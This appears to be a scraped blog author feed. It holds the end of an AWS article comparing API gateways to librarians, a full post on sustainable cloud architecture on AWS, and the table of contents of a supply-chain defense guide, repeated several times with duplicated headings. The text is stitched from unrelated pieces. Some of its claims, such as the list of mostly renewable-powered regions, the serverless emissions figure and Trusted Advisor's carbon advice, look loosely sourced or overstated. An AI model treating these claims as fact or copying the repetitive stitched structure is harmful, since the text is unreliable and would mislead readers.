API Gateways are like friendly librarians who help people find books and resources. They ask everyone to show their library card before they can borrow books to keep things organized. The librarians make sure no one takes too many books at once to ensure everyone gets a fair chance. When someone asks for information, they check a special guide to ensure they get the right answers. They help people find the information they need, making sure everything is accurate and easy to understand.

In AWS you can create an API Gateway to help organize and secure access to your app's information and services. It's like having a helpful librarian who ensures that everyone can access the information they want with ease.

Conclusion: Picking the Right Tool for the Job

In the world of AWS Load Balancers, Reverse Proxies and API Gateways are essential tools to help your apps run efficiently, securely, and smoothly. Just like in real life choosing the right tool for your needs is crucial. Load Balancers distribute traffic, Reverse Proxies keep things organized and secure, and API Gateways guide people to the right information and services. By understanding these everyday comparisons, you can make informed decisions about which AWS service best suits your needs ensuring a successful and hassle-free cloud journey.

Building a Greener Cloud: The Role of an Architect for Sustainability in AWS

Ahmad Kanj — Sun, 19 Feb 2023 16:17:56 +0000

In recent years, the term 'sustainability' has become increasingly important, and for good reason. Climate change is one of the biggest threats facing our planet, and we need to take immediate action to mitigate its effects. One area where we might not expect to find an impact is in the world of technology, and specifically cloud computing. However, as it turns out, the cloud could be doing more damage to the planet than we realize.

Why this is the case?

First, we need to look at how cloud computing works. Essentially, when we use cloud-based services, we are outsourcing the processing and storage of our data to massive data centers. These data centers are run by Amazon, Microsoft, and Google, and they are some of the largest energy consumers in the world. To power these centers, they require vast amounts of electricity, much of which comes from non-renewable sources like coal and natural gas.

The result of all this energy consumption is a significant carbon footprint. In fact, according to a report by Greenpeace, the internet and technology account for around 4% of global carbon emissions, more than double the emissions produced by the airline industry. By 2030, it's expected that this figure could double again, with technology and cloud computing accounting for over 8% of all carbon emissions.

What can we do about this?

The good news is that there are a number of initiatives underway to reduce the impact of cloud computing on the environment. Many of the major cloud providers have committed to using renewable energy sources to power their data centers. For example, Google has been carbon-neutral since 2007, and plans to be powered entirely by renewable energy by 2030. Microsoft has pledged to be carbon negative by 2030, while Amazon has committed to powering its operations with 100% renewable energy by 2025.

That’s why AWS is taking steps to make their operations more sustainable. They know that in order to keep our planet healthy, we need to work together to reduce our carbon footprint and minimize our impact on the environment.

The AWS Sustainability Pillar

At re:Invent 2021, AWS announced that it’s adding a new Sustainability Pillar to the AWS Well-Architected Framework. This new pillar is designed to help developers and organizations incorporate sustainability into their cloud architecture and operations.

The Sustainability Pillar provides guidance on how to design and operate cloud workloads in a way that minimizes their impact on the environment. It covers a wide range of topics, including energy efficiency, waste reduction, and sustainable sourcing.

By incorporating the Sustainability Pillar into their architecture, developers can create cloud solutions that are not only more environmentally friendly but also more cost-effective and scalable.

Architect for Sustainability

This is where the concept of Architect for Sustainability comes in – a framework for designing cloud solutions that are environmentally responsible. Architect for Sustainability is a set of best practices for cloud architecture that prioritize sustainability in design, development, and deployment. It is a holistic approach that considers the entire lifecycle of cloud solutions, from design to end-of-life disposal.

To be sustainable on the cloud, businesses must work with cloud providers that are committed to Architect for Sustainability. This means choosing providers that have a clear sustainability strategy and have implemented best practices to reduce their environmental impact. It also means businesses must be conscious of their own carbon footprint and take steps to reduce their energy consumption and carbon emissions. Here are some key principles of Architect for Sustainability on AWS:

AWS Customer Carbon Footprint Tool

In addition to the Sustainability Pillar, AWS is also working on a customer carbon footprint tool. This tool will allow AWS customers to measure and analyze the carbon footprint of their cloud operations.

By understanding the environmental impact of their cloud operations, customers can take steps to reduce their carbon footprint and make their operations more sustainable. This will not only benefit the environment but also help customers save money on their cloud operations.

Use AWS’s carbon-free regions

AWS has carbon-free regions that use renewable energy sources to power their data centers. By the end of 2021, several AWS regions were powered by over 95% renewable energy, including:

US East (Northern Virginia)
US West (Northern California)
US East (Ohio)
US West (Oregon)
GovCloud (US-East)
GovCloud (US-West)
Canada (Central)
Europe (Ireland)
Europe (Frankfurt)
Europe (London)
Europe (Milan)
Europe (Paris)
Europe (Stockholm)

This means that using AWS in these regions can significantly reduce carbon emissions and help companies move towards their sustainability goals.

Use serverless computing

According to a study by Accenture, serverless computing can reduce carbon emissions by up to 70% compared to traditional server-based computing. This is because serverless computing platforms, such as AWS Lambda, can quickly scale up or down to match the demand for resources. As a result, businesses using AWS Lambda can reduce the number of servers they require, leading to a significant reduction in carbon emissions.

Use auto-scaling

AWS Auto-Scaling is a service that automatically adjusts the capacity of an application in response to changing demand. It monitors resource utilization and scales resources up or down as necessary. By using AWS Auto Scaling, businesses can ensure that their applications are always running at optimal performance levels, without wasting resources or energy.

Choose the most energy-efficient instance type

AWS offers a wide range of instance types to choose from, some of which are more energy-efficient than others. For example, instances that use ARM-based processors are more energy-efficient than those that use Intel processors.

Use CloudFront

One of the main ways that AWS CloudFront helps to reduce energy consumption and carbon emissions is through the use of edge locations. Edge locations are data centers that are located in different parts of the world and are designed to cache content so that it can be delivered quickly to customers in that region. By using edge locations, AWS CloudFront reduces the need for content to travel long distances, which in turn reduces the amount of energy needed to deliver that content. This helps to lower the carbon footprint of companies that use AWS CloudFront, as less energy is needed to power the delivery of their content.

Another way that AWS CloudFront helps to reduce energy consumption and carbon emissions is through the use of caching. When content is requested by a customer, AWS CloudFront checks to see if that content is already stored in an edge location. If the content is already cached in an edge location, AWS CloudFront can deliver it quickly without having to retrieve it from the original source. This reduces the amount of energy needed to retrieve and deliver the content, as well as the carbon emissions associated with that process.

Use AWS Trusted Advisor

AWS Trusted Advisor is a tool that provides recommendations to optimize AWS infrastructure and resources. It analyzes an organization's AWS environment and provides guidance on cost optimization, security, performance, and fault tolerance. One of the lesser-known features of Trusted Advisor is its ability to help reduce energy consumption and carbon emissions. It provides a list of best practices for reducing energy consumption and carbon emissions.

The Future of Sustainable Cloud

As cloud technology continues to evolve, it’s important that we prioritize sustainability and work to reduce our impact on the environment. By incorporating sustainability into our cloud operations, we can create a more sustainable future for our planet and ensure that we can continue to enjoy the things that make Earth so unique, like pizza.

AWS’s new Sustainability Pillar and customer carbon footprint tool are just two examples of how cloud providers are working to make their operations more sustainable. As more organizations prioritize sustainability in their cloud architecture, we can create a more sustainable future for our planet and ensure that we can continue to thrive on Earth for generations to come.

DEV Community: Ahmad Kanj

Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1

Where the attack surface actually lives now

The twelve boundaries

Phase 1. Source-side: what enters your repo

Boundary 1: Source → Repository (Who can write to main?)

Boundary 2: Maintainer → Package (Is this dependency safe?)

Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)

Boundary 4: Install → Lifecycle scripts (What runs on install?)

Phase 2. Build-side: what runs during your build

Boundary 5: Source → Image (Is our build environment trustworthy?)

Boundary 6: Image → Registry (Can downstream verify what we shipped?)

Boundary 7: Tag → Commit (What does this uses: / include / plugin actually point to?)

Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)

Boundary 9: Untrusted input → Shell (CWE-78 in CI)

Phase 3. Runtime-side: what ships and what leaks

Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)

Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)

Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)

When prevention fails: the response side

What one week of focused work actually moved

Five lessons that don't fit in a framework

1. The "patched version" you find in an advisory is not always the version you can ship.

2. Aggressive controls block legitimate fixes. Calibrate, don't posture.

3. Detection without enforcement is not security.

4. The blast radius of a CI compromise is usually larger than any application bug.

5. These controls assume a clean threat model. Both halves of that assumption fail.

Process and culture

What you can ship alone vs. what needs platform

Translation table: the boundaries in your stack

Closing

Appendix: minimal viable starter pack

Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1

Where the attack surface actually lives now

The twelve boundaries

Phase 1 Source-side: what enters your repo

Boundary 1: Source → Repository (Who can write to main?)

Boundary 2: Maintainer → Package (Is this dependency safe?)

Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)

Boundary 4: Install → Lifecycle scripts (What runs on install?)

Phase 2 Build-side: what runs during your build

Boundary 5: Source → Image (Is our build environment trustworthy?)

Boundary 6: Image → Registry (Can downstream verify what we shipped?)

Boundary 7: Tag → Commit (What does this uses: / include / plugin actually point to?)

Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)

Boundary 9: Untrusted input → Shell (CWE-78 in CI)

Phase 3 Runtime-side: what ships and what leaks

Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)

Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)

Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)

When prevention fails: the response side

What one week of focused work actually moved

Five lessons that don't fit in a framework

1. The "patched version" you find in an advisory is not always the version you can ship.

2. Aggressive controls block legitimate fixes. Calibrate, don't posture.

3. Detection without enforcement is not security.

4. The blast radius of a CI compromise is usually larger than any application bug.

5. These controls assume a clean threat model. Both halves of that assumption fail.

Process and culture

What you can ship alone vs. what needs platform

Translation table: the boundaries in your stack

Closing

Appendix: minimal viable starter pack

Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1

Where the attack surface actually lives now

The twelve boundaries

Phase 1 Source-side: what enters your repo

Boundary 1: Source → Repository (Who can write to main?)

Boundary 2: Maintainer → Package (Is this dependency safe?)

Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)

Boundary 4: Install → Lifecycle scripts (What runs on install?)

Phase 2 Build-side: what runs during your build

Boundary 5: Source → Image (Is our build environment trustworthy?)

Boundary 6: Image → Registry (Can downstream verify what we shipped?)

Boundary 7: Tag → Commit (What does this uses: / include / plugin actually point to?)

Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)

Boundary 9: Untrusted input → Shell (CWE-78 in CI)

Phase 3 Runtime-side: what ships and what leaks

Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)

Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)

Boundary 1: Source → Repository (Who can write to `main`?)

Boundary 7: Tag → Commit (What does this `uses:` / include / plugin actually point to?)

Boundary 1: Source → Repository (Who can write to `main`?)

Boundary 7: Tag → Commit (What does this `uses:` / include / plugin actually point to?)

Boundary 1: Source → Repository (Who can write to `main`?)

Boundary 7: Tag → Commit (What does this `uses:` / include / plugin actually point to?)

The Global Blast Radius: Why You Should Never Host in `us-east-1`